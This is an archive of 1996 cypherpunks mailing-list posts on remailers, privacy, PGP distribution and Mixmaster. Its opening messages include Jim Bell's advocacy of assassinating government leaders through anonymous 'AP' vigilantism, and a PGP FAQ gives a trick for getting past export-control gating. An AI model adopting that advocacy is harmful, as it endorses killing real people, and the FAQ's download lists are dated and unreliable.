>:self-defense.  You may argue as to what's really self-defense and what
>:isn't,  but the reality is that government engages in violence and the
>:threat of violence regularly.  Are you, by your statements, implicitly
>:tolerating violence by government that you wouldn't tolerate from
>:individuals?  It is easy to fall into such a trap.
>
>But self-defense is not conductive either.  To bring a rather fascinating
>example into this, in the 70s a group of students occupied a variety of
>buildings at NYU in protest against the Cambodian war.  They set a bomb
>in our computing center that was defused just before it blew.  But if it
>had detonated it would have destroyed a rather large computer (used for
>pure mathematical problems that the Dept. of Defense wished to
>incorporate into its Nuclear program)

Nuclear bomb design.  Done with funds stolen from taxpayers.  Done to 
protect the leadership of this country, not the public.

> and a number of people standing
>outside the building.  The rationale used was that this was
>"self-defense", the people of the world were banding together to protect
>each other from the actions of the state. 

In practice, it probably WAS "self-defense."  However, it may not have been 
a particularly selective example of self-defense.  The system I describe is, 
in fact, vastly more effective than this at getting rid of the bad guys, and 
far more selective than a planted bomb.


> While I sympathize with the
>feelings that led the activists to take such measures, I have no respect
>for their methods or the reasoning they employed to extend the argument
>for self-defense into a situation that had nothing to do with
>self-defense.

That's why I think my system will be far better.

>No, I do not wish to condone the coercive actions of the state (and
>certainly not any violent ones), and certainly we all take exception to
>one or another act of the government machine.  Incidentally, I do not
>believe the state has the right to take life in the quest for justice
>(aka the death penalty).  A war against a foreign threat can be justified
>on grounds of self-defense.

Notice, however, that the US government fails to use a cleaner method to 
defeat its opponents (killing the leaders) and in  its place puts the lives 
of thousands of solders at risk.  Isn't this illogical, unless you realize 
that if WE can do that to those foreign leaders, THEY can do the same to OUR 
leaders?  Isn't this more than a bit self-serving on the part of our leaders?

And isn't it immoral for George Bush, for instance, to choose a solution 
that results in the deaths of tens of thousands of comparatively innocent 
Iraqis, both during and after the Gulf war, rather than bumping off Saddam 
Hussein?  Think about it.  Exactly why does he do the former, rather than 
the latter?


>:Why?  Isn't it possible that it is not possible to reform a system because
>:embedded within it is a fundamental flaw which makes real freedom
>:impossible?  The current system is heirarchically structured, and results in
>:situations where millions die in the place of the very few.  I'd say that's
>:a serious, systemic flaw that needs fixing.
>
>- From what I've gathered of AP, it attempts no radical reformation of "the
>system", simply adds another set of costs for individuals within the govt.
>to take into account. 

"Another set of costs"?  Yikes!  Read the essay, governments as we know them 
can't possibly survive post-AP.

>I don't think you're proposing a "true democracy"
>or absolute anarchy (without all the conotations of disorder, simply
>no-government), but rather a vigilante clause, I may have misunderstood
>you though. 

It may be looked at as an example of vigilante action, but it will be 
ANONYMOUS vigilantes.

> A minimalist state is generally considered desireable as it
>provides a framework within which individuals can engage in mutually
>beneficial interactions with each other. 

That's conventional wisdom.  Historically, anarchy is considered unstable.  
Freud though so, but he was wrong.  Read part 9.

> Our present structures do not
>"work" very well (though they have their redeeming factors when compared
>to other alternatives) and I'd say we need a greater degree of respect for
>personal liberty and individualism than is manifest in our institutions
>today, but these changes take place on a level very different from that of
>govt.  the state is almost powerless when it comes to these metamorphoses
>in opinion. 

Well, I disagree.  Until recently, public opinion was almost entirely
manufactured.  It was a joint project of the government and the news media.

> They take place through tradition and the spread of ideas not
>through legislation.  The alternative I would suggest is an appreciation
>for the minimalist state (with the observation that there are some things
>the state does do very well, and which are desireable) and the liberty of
>the individual.  Similarly a respect for life is in order, too often we
>think we're absolutely right and believe we should use "any means
>necessary" (no reflection on the misunderstood philosophy of Malcolm X)

Is there any significant likelihood that the people in power today will 
relinquish power absent a system such as AP?  I'm not optimistic about that.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 06:36:36 +0800
To: remailer-operators@c2.org
Subject: Mixmaster version usable with POP?
Message-ID: <01I54W2YQPBC8Y4ZK2@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One application of an anonymous remailer that has come up is using POP
to get into an account via which remailing could be done without the remailer
having to run on the machine receiving/sending the mail. It would instead occur
on a machine running the remailer software and equipped for doing POP. Has
anyone written a mixmaster version (or additions onto Mixmaster) that will do
this automatically?
	While having the entire remailer with logs and private key in a
different country would still be best, if an anonymous POP account were used
this would still shield the remailer operator from forced disclosure. It would
also cut down on the costs; for instance, offshore.com.ai's monthly price for
a UNIX shell account is 50$ a month, but theirs for an email-only account is
20$ a month (albeit with only 20 M/month of mail). 
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 06:49:21 +0800
To: hfinney@shell.portal.com
Subject: Re:  Why does the state still stand:
Message-ID: <01I54WMDV8268Y4ZK2@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 16-MAY-1996 10:21:05.33

>One issue is whether these banking-secrecy countries like Anguilla are
>followers of the Berne convention or other international copyright
>regulations.  Banking secrecy and software piracy don't necessarily go
>hand in hand.  I hear a lot about copyright violations in China but not
>in the Caribbean.  So actually it isn't clear that this country is the
>right location for a remailer that can post arbitrary material.

	As I have stated, I am currently working on the second edition of this
list. One consideration that I have thought of on using a banking-secrecy
country is that it may be possible to set up a local limited-liability
corporation there (assuming a remailer requiring an ecash payment), possibly
paying into a trust fund with duress provisions. As an example, I might set
up an offshore company in Anguilla which was owned by a trust fund; I would
be the initial trustee for this trust fund, and Vince Cate might be the
backup trustee if I was put under any duress (e.g., legal problems). Since I
would have some costs for the initial setup of such an operation, I would deem
it perfectly reasonable for the trust fund to owe me some money, which it would
then pay me back as interest on this loan.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Mon, 27 May 1996 06:35:33 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Children's Privacy Act
Message-ID: <199605260449.VAA29497@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 May 1996 08:37:24 pdt, bruce@aracnet.com wrote:

>At 11:34 PM 5/24/96 -0700, tcmay@got.net (Timothy C. May) wrote:
>
>>If I have compiled records, dossiers, etc., as I most assuredly have (got
>>to fill up those MO disks with something), this is "my" information. Mine
>>in the sense that others can't dictate to me what I do with it.
>
>I don't see that this is necessarily true for information any more than it
>is property. Property can be bought, sold, traded, given away, made...but it
>can also be stolen. Just as I have a right to complain if you walk off with
>my couch without my permission, so if you walk off with data on my blood
>chemistry or credit history without my permission.

Yes. For instance, a photographer should get a release for a photo of a person, 
particularly if he plans to resell it. It does make me wonder whether you could file a suit 
against TRW for selling information about you, particularly since it could affect you 
adversely and there is no guaruntee it is accurate.
/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Mon, 27 May 1996 07:05:53 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605252140.OAA04527@mail.pacifier.com>
Message-ID: <Pine.ULT.3.92.960525210934.1227E-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 25 May 1996, jim bell wrote:

:Which means that attempting to clean up the system by half-measures is
:doomed to failure, wouldn't you say?

The exception I took to your proposal was that it seemed like a
half-measure to me.  From what I understand of it the porposal is that
elected officials who "do wrong" (or violate a particular code of conduct)
should be killed.  I would suggest that this is problematic because it
does nothing to solve the ills of the system, simply clears those players
whom a particular set of people do not believe are playing fairly/well.

:fundamental.  Admittedly, it is still a bit scary, because of the depth of
:its changes, but that does not make it wrong!

Yes we do have fear the unfamiliar.

<some discussion about the actions taken by the state against its citizens
and other nations>

I'm not sure I'd accept the claim that millions of offenders (I too find
drug laws stifling, illogical and counter to the liberal ideal) are put in
jail, deprived of their freedom by a particular set of people.  Drug laws
are a reflection of the opinions held by many people in this country (and
others), of course we wonder sometimes whether people have really thought
about it or whether the "just say no" jingle was too irresistable, and the
concept of "a war on drugs" another tool to define outsiders against whom
to band against and maintain a cohesive identity.  And the manner in which
Americans (and indeed other peoples) have been whipped into fervour by
the rhetoric that accompanies a war is truly frightening.  But I reall
don't think killing a few Presidents or Joint Chiefs of Staff or Prime
Ministers will solve this (or anything).  It seems as if you were trying
to say that AP is acceptable because similar methods are employed by the
state all the time.  I will not defend the coercive actions of the state,
but I do not believe they give one the right to coerce others, especially
if they are removed from the actual act.

:Then you need to learn to be more consistent.  While you may, indeed, be a
:pacifist, most of the rest of us see nothing wrong with the concept of
:self-defense.  You may argue as to what's really self-defense and what
:isn't,  but the reality is that government engages in violence and the
:threat of violence regularly.  Are you, by your statements, implicitly
:tolerating violence by government that you wouldn't tolerate from
:individuals?  It is easy to fall into such a trap.

But self-defense is not conductive either.  To bring a rather fascinating
example into this, in the 70s a group of students occupied a variety of
buildings at NYU in protest against the Cambodian war.  They set a bomb
in our computing center that was defused just before it blew.  But if it
had detonated it would have destroyed a rather large computer (used for
pure mathematical problems that the Dept. of Defense wished to
incorporate into its Nuclear program) and a number of people standing
outside the building.  The rationale used was that this was
"self-defense", the people of the world were banding together to protect
each other from the actions of the state.  While I sympathize with the
feelings that led the activists to take such measures, I have no respect
for their methods or the reasoning they employed to extend the argument
for self-defense into a situation that had nothing to do with
self-defense.

No, I do not wish to condone the coercive actions of the state (and
certainly not any violent ones), and certainly we all take exception to
one or another act of the government machine.  Incidentally, I do not
believe the state has the right to take life in the quest for justice
(aka the death penalty).  A war against a foreign threat can be justified
on grounds of self-defense.

:>and the proponents of such systems would do well to look more closely
:>at the systemic ills rather than individuals.
:
:Why?  Isn't it possible that it is not possible to reform a system because
:embedded within it is a fundamental flaw which makes real freedom
:impossible?  The current system is heirarchically structured, and results in
:situations where millions die in the place of the very few.  I'd say that's
:a serious, systemic flaw that needs fixing.

- From what I've gathered of AP, it attempts no radical reformation of "the
system", simply adds another set of costs for individuals within the govt.
to take into account.  I don't think you're proposing a "true democracy"
or absolute anarchy (without all the conotations of disorder, simply
no-government), but rather a vigilante clause, I may have misunderstood
you though.  A minimalist state is generally considered desireable as it
provides a framework within which individuals can engage in mutually
beneficial interactions with each other.  Our present structures do not
"work" very well (though they have their redeeming factors when compared
to other alternatives) and I'd say we need a greater degree of respect for
personal liberty and individualism than is manifest in our institutions
today, but these changes take place on a level very different from that of
govt.  the state is almost powerless when it comes to these metamorphoses
in opinion.  They take place through tradition and the spread of ideas not
through legislation.  The alternative I would suggest is an appreciation
for the minimalist state (with the observation that there are some things
the state does do very well, and which are desireable) and the liberty of
the individual.  Similarly a respect for life is in order, too often we
think we're absolutely right and believe we should use "any means
necessary" (no reflection on the misunderstood philosophy of Malcolm X)

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
WHERE CAN THE MATTER BE

	Oh, dear, where can the matter be
	When it's converted to energy?
	There is a slight loss of parity.
	Johnny's so long at the fair.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMae4ZBwDKqi8Iu65AQH/uQMAutPdsot4N9/dBFK1OhSmf9XHNsuic0yD
JL19I68i0kgUt1omXqySVy0w/FfyUkqWo7XYsTfBkrRAGz2X8KNHkMRYEr2TGl9Q
/TI6Kn5NBTXx49XXYeHU4q/dYAaZoJ0j
=inqJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Johnson <mpj@csn.net>
Date: Mon, 27 May 1996 07:05:40 +0800
To: viacrypt@ACM.ORG
Subject: Where is PGP?
Message-ID: <Pine.3.89.9605252346.A803-0100000@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ

Revised 24 May 1996

Disclaimer -- I haven't recently verified all of the information in
this file, and much of it is probably out of date.

For questions not covered here, please read the documentation
that comes with PGP, get one of the books mentioned below, or search for
other relevant FAQ documents at rtfm.mit.edu and on the alt.security.pgp
news group.


A NOTE FROM THE FAQ MAINTAINERS

Peter Herngaard <pethern@datashopper.dk> is taking over the maintenance
of this FAQ until further notice.

Some of you sent me (Mike Johnson) corrections and suggestions for
this FAQ, and I stored them away on my hard disk to edit from. Then,
Windows 95 got indigestion (induced by a sound card) and destroyed
all of the data in that partition. If you suggested changes and they
aren't in this FAQ, please send them to Peter Herngaard
<pethern@datashopper.dk>.


WHAT IS THE LATEST VERSION OF PGP?

Viacrypt PGP (commercial version): 2.7.1 (4.0 is due out Real Soon Now)

MIT & Philip Zimmermann (freeware, USA-legal): 2.6.2

Staale Schumacher's International variant: 2.6.3i for non-USA
                    (2.6.3ai source code only); 2.6.3 for USA

WHERE CAN I GET VIACRYPT PGP?

Just call 800-536-2664 and have your credit card handy.
WHERE IS PGP ON THE WORLD WIDE WEB?

U.S. only availability:
PGP: http://web.mit.edu/network/pgp-form.html
PGPfone: http://web.mit.edu/network/pgpfone
International availability:
PGP and PGPfone: http://www.ifi.uio.no/pgp/

WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:

ftp://net-dist.mit.edu/pub/PGP/README
ftp://ftp.csn.net/mpj/README.MPJ
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/
ftp://ftp.gibbon.com/pub/pgp/README.PGP
ftp://ftp.wimsey.bc.ca/pub/crypto/software/README

WHERE IS PGP ON COMPUSERVE?

GO NCSAFORUM. Follow the instructions there to gain access to Library 12:
Export Controlled.

AOL

Go to the AOL software library and search "PGP" or ftp from
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp or another site listed above.
It is possible to get PGP from ftp sites with hidden directories with the
following trick:  (1) View the README file with the hidden directory name in
it, then quickly (2) Start a new ftp connection, specifiying the hidden
directory name with the ftp site's address, like
ftp.csn.net/mpj/I_will_not_export/crypto_xxxxxxx (where the xxxxxxx is
replaced with the current character string).

WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP. The following carry recent versions of PGP and
allow free downloads of PGP.

US

303-343-4053 Hacker's Haven, Denver, CO
303-772-1062 Colorado Catacombs BBS, Longmont CO
   8 data bits, 1 stop, no parity, up to 28,800 bps.
   Use ANSI terminal emulation.
   For free access: log in with your own name, answer the questions.
314-896-9309 The KATN BBS
317-887-9568 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
   Login First Name: PGP  Last Name: USER   Password: PGP
501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
   Login name: PGP USER Password: PGP
506-457=0483 Data Intelligence Group Corporation BBS
508-668-4441 Emerald City, Walpole, MA
601-582-5748 CyberGold BBS
612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN
914-667-4567 Exec-Net, New York, NY
915-587-7888, Self-Governor Information Resource, El Paso, Texas

GERMANY

+49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet
+49-521-68000 BIONIC-BBS Login: PGP

WHERE CAN I FTP PGP CLOSE TO ME?

IT
ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

FI

ftp://ftp.funet.fi/pub/crypt/pgp/

NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp
NO
ftp://menja.ifi.uio.no/pub/pgp/
NZ

ftp://ftphost.vuw.ac.nz

SE

ftp://leif.thep.lu.se

TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

UK

ftp://ftp.ox.ac.uk/pub/crypto/pgp
HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message saying
"help" to ftpmail@decwrl.dec.com or mailserv@nic.funet.fi

WHERE CAN I GET MORE PGP INFORMATION?

http://www.csn.net/~mpj
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/(c'est en francais)
http://web.cnam.fr/Network/Crypto/survey.html(en anglais)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
http://www.pgp.net/pgp
http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html
http://www.ifi.uio.no/pgp/
http://inet.uni-c.dk/~pethern/privacy.html

WHAT ARE SOME GOOD PGP BOOKS?

 Protect Your Privacy: A Guide for PGP Users
 by William Stallings
 Prentice Hall PTR
 ISBN 0-13-185596-4
 US $19.95

 PGP: Pretty Good Privacy
 by Simson Garfinkel
 O'Reilly & Associates, Inc.
 ISBN 1-56592-098-8
 US $24.95

 E-Mail Security: How to Keep Your Electronic Mail Private
 "Covers PGP/PEM"
 by Bruce Schneier
 Wiley Publishing

 The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data
 Protection, and PGP PRivacy Software
 by Andr&eacute; Bacard
 Peachpit Press
 ISBN 1-56609-171-3
 US $24.95
 800-283-9444 or 510-548-4393

 THE OFFICIAL PGP USER'S GUIDE
 by Philip R. Zimmerman
 MIT Press
 April 1995 - 216 pp. - paper - US $14.95 - ISBN 0-262-74017-6 ZIMPP
 Standard PGP documentation neatly typeset and bound.

 PGP SOURCE CODE AND INTERNALS
 by Philip R. Zimmerman
 April 1995 - 804 pp. -
 US $55.00 - 0-262-24039-4 ZIMPH

 How to Use PGP, 61 pages,  (Pub #121) from the Superior Broadcasting Company,
 Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about US $10-$13).

IS PGP LEGAL?

Pretty Good Privacy is legal if you follow these rules:

Don't export PGP from the USA except to Canada, or from Canada except to the
USA, without a license.

If you are in the USA, use either Viacrypt PGP (licensed for commercial use)
or MIT PGP using RSAREF (limited to personal, noncommercial use). Outside of
the USA, where RSA is not patented, you may prefer to use a version of PGP
(2.6.3i) that doesn't use RSAREF to avoid the restrictions of that license.

If you are in a country where the IDEA cipher patent holds in
software (including the USA, Canada, and some countries in Europe), make
sure you are licensed to use the IDEA cipher commercially before using
PGP commercially. (No separate license is required to use the freeware
PGP for personal, noncommercial use). For direct IDEA licensing, contact
Ascom Systec:

Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  +41 64 56 59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  +41 64 56 59 45
Fax:            +41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)

Viacrypt has an exclusive marketing agreement for commercial
distribution of Philip Zimmermann's copyrighted code. (Selling
shareware/freeware disks or connect time is OK). This restriction does
not apply to PGP 3.0, since it is a complete rewrite by Colin Plumb.

If you modify PGP (other than porting it to another platform, fixing a bug,
or adapting it to another compiler), don't call it PGP (TM) or Pretty Good
Privacy (TM) without Philip Zimmermann's permission.
IMPORTANT:
Please note that there is an official distribution site for MIT
PGP and another for the International version:
WorldWideWeb references:
U.S/Canada non-commercial use: http://web.mit.edu/network/pgp-form.html
Norway/International non-commercial use: http://www.ifi.uio.no/pgp/
U.S. commercial use: http://www.viacrypt.com

WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann was under investigation for alleged violation of export
regulations, with a grand jury hearing evidence for about 28 months, ending
11 January 1996. The Federal Government chose not to comment on why it
decided to not prosecute, nor is it likely to.  The Commerce Secretary stated
that he would seek relaxed export controls for cryptographic products, since
studies show that U. S. industry is being harmed by current regulations.
Philip endured some serious threats to his livelihood and freedom, as well as
some very real legal expenses, for the sake of your right to electronic
privacy.  The battle is won, but the war is not over. The regulations that
caused him so much grief and which continue to dampen cryptographic
development, harm U. S. industry, and do violence to the U. S. National
Security by eroding the First Ammendment of the U. S. Constitution and
encouraging migration of cryptographic industry outside of the U. S. A. are
still on the books.  If you are a U. S. Citizen, please write to your U. S.
Senators, Congressional Representative, President, and Vice President
pleading for a more sane and fair cryptographic policy.

WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.dayton.net/~cwgeib
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip
http://www.eskimo.com/~joelm(Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip
http://iquest.com/~aegisrcs

WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional encryption only of a file (-c) option, but
you might want to investigate some of the other alternatives if you do
this a lot. Alternatives include Quicrypt and Atbash2 for DOS, DLOCK for
DOS & UNIX, Curve Encrypt (for the Mac), HPACK (many platforms), and a
few others.

Quicrypt is interesting in that it comes in two flavors:  shareware
exportable and registered secure. Atbash2 is interesting in that it generates
ciphertext that can be read over the telephone or sent by Morse code. DLOCK
is a no-frills strong encryption program with complete source code. Curve
Encrypt has certain user-friendliness advantages. HPACK is an archiver (like
ZIP or ARC), but with strong encryption. A couple of starting points for your
search are:
U.S. only availability:
ftp://ftp.csn.net/mpj/qcrypt11.zip
ftp://ftp.csn.net/mpj/README
ftp://ftp.miyako.dorm.duke.edu/pub/GETTING_ACCESS
International availability:
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
ftp://ftp.dsi.unimi.it/pub/crypt/code/
HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty good. I
use DELETE.EXE in del110.zip, which is really good at deleting existing
files, but doesn't wipe "unused" space.
US
ftp://ftp.csn.net/mpj/public/del120.zip
NL
ftp://utopia.hacktic.nl/pub/replay/pub/security/del120.zip
UK
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip

WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at any
time, meaning that all kinds of interesting things could end up in your
swap file.

ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip

WHERE DO I GET PGPfone(tm)?

PGPfone is in beta test for Macintosh and Windows'9 users.
The MIT has shut down their ftp distribution of PGPfone <tm> for
Macintosh and Windows'95, so within the U.S/Canada you must obtain
PGPfone <tm> using a WorldWideWeb browser.

U.S. only availability:
http://web.mit.edu/network/pgpfone
International availability:
DK
ftp://ftp.datashopper.dk/pub/users/pethern/pgp/
NL
ftp://utopia.hacktic.nl/pub/replay/pub/voice/
NO
ftp://menja.ifi.uio.no/pub/pgp/mac/
ftp://menja.ifi.uio.no/pub/pgp/windows/
WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a
program called Nautilus that enables you to engage in secure voice
conversations between people with multimedia PCs and modems capable of
at least 7200 bps (but 14.4 kbps is better). See:
U.S. only availability:
ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/nautilus-phone-0.9.2-source.tar.gz
ftp://ftp.csn.net/mpj/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
International availability:
ftp://ftp.ox.ac.uk/pub/crypto/misc
ftp://utopia.hacktic.nl/pub/replay/pub/voice/
The official Nautilus homepage is at:
http://www.lila.com/nautilus/
HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Secure File System (SFS) is a DOS device driver that encrypts an entire
partition on the fly using SHA in feedback mode.

Secure Drive also encrypts an entire DOS partition, using IDEA, which is
patented.

Secure Device is a DOS device driver that encrypts a virtual, file-hosted
volume with IDEA.

Cryptographic File System (CFS) is a Unix device driver that uses DES.
CryptDisk is a ShareWare package for Macintosh that uses strong IDEA
encryption like PGP.

U.S. only availability:
ftp://ftp.csn.net/mpj/README
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
International availability:
http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.ox.ac.uk/pub/crypto/misc/
ftp://menja.ifi.uio.no/pub/pgp/mac/
ftp://utopia.hacktic.nl/pub/replay/pub/disk/
WHERE IS PGP'S COMPETITION?

RIPEM is the second most popular freeware email encryption package.  I like
PGP better for lots of reasons, but if for some reason you want to check or
generate a PEM signature, RIPEM is available at ripem.msu.edu. There is also
an exportable RIPEM/SIG.
U.S. only availability:
ftp://ripem.msu.edu/pub/GETTING_ACCESS
International availability:
ftp://ftp.dsi.unimi.it/pub/crypt/code/
HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help" in the
subject line to find out how to use them. These servers sychronize keys with
each other.  There are other key servers, too.

pgp-public-keys@keys.pgp.net
pgp-public-keys@keys.de.pgp.net
pgp-public-keys@keys.no.pgp.net
pgp-public-keys@keys.uk.pgp.net
pgp-public-keys@keys.us.pgp.net

WWW interface to the key servers: http://www.pgp.net/pgp/www-key.html
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html

For US $20/year or so, you can have your key officially certified and
published in a "clean" key database that is much less susceptible to
denial-of-service attacks than the other key servers. Send mail to
info-pgp@Four11.com for information, or look at http://www.Four11.com/

Of course, you can always send your key directly to the parties you wish to
correspond with by whatever means you wish.

CAN I COPY AND REDISTRIBUTE THIS FAQ?

Yes. Permission is granted to distribute unmodified copies of this FAQ.

Please e-mail comments to Peter Herngaard <pethern@datashopper.dk>
Look for the latest html version of this FAQ at
http://inet.uni-c.dk/~pethern/getpgp.html

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQEVAgUBMaftOm+Iqt/O4EnZAQHk8ggAwL5UcRF4Gv1F6eO7NaQcb45Xa+ST3l3S
+6sPHN5vFn/LvUsNHO4o9gDBDJB3Bd8S3nDfRxoSolD1ijNtKGOvJzzXtAf2lXFI
95YXCuF+DyhBrghBfwNzFePjuiDZ/92aeXn90oAEpHc5gaUFoSo+o9Gu8sD0TMo7
p3houk0AdVRRQBTTljWDin2yoJcGLzbmY6ewRcdkYnEqmcv2oW9drSKky04bcg2A
KGfOKk/5i1Mw3CPKJu/eHy1gi0P4hd5WbH23Jc3cHQVk2BvmR6lLL+ffl4TGjkxt
o61fzYYunxuQzLOi4EeQWWhq31+WJwOO0CuW35nA1XzoQXALdBfF8A==
=1NGG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Mon, 27 May 1996 06:20:43 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: MixMaster fair use
Message-ID: <adcdaa4702021004c318@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:14 PM 5/22/96, Bill Stewart wrote:
>At 12:14 AM 5/22/96 EDT, you wrote:
>>From:  IN%"loki@infonex.com" 21-MAY-1996 17:19:02.59
>>
>>>The problem is RSAREF. I can't chose license terms for that.
>>
>>       Oof... I see the problem. No, it's not you, it's them.
>
>The Agreement, as written, covers all of Mixmaster; it would be easier
>for people to adapt Mixmaster code if you either release a bones version
>or a license that clarifies that you can't use the RSAREF portions
>commercially but can do whatever you want with the rest of Mixmaster
>(if that's what you want) or however much freedom you want to grant
>(e.g. you may want to say some disclaimerish words about obeying ITAR etc.)
>

I think the current license is fine for most purposes. I am not some
monolithic corporation. If someone needs a license with special terms, my
email address is public knowledge and I am generally very accommodating.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Mon, 27 May 1996 06:24:03 +0800
To: cypherpunks@toad.com
Subject: Re: DOS/WINDOWS Mixmaster Client
Message-ID: <adcdab710302100408ea@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM 5/20/96, anonymous-remailer@shell.portal.com wrote:
>Anyone know if there is a DOS or Windows version of the mixmaster
>client?


We are talking days now. Really, I mean it this time. I know I said that
last time (and the time before) but this time it is true. Trust me, I have
your best interests at heart :)

In fact, I have a working version. I am just beating on it a bit, and
waiting for the Mix enabled Private Idaho (in beta) to be ready. Since Mix
can't call sendmail on a PC, a front end is really required for it to be
useful.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
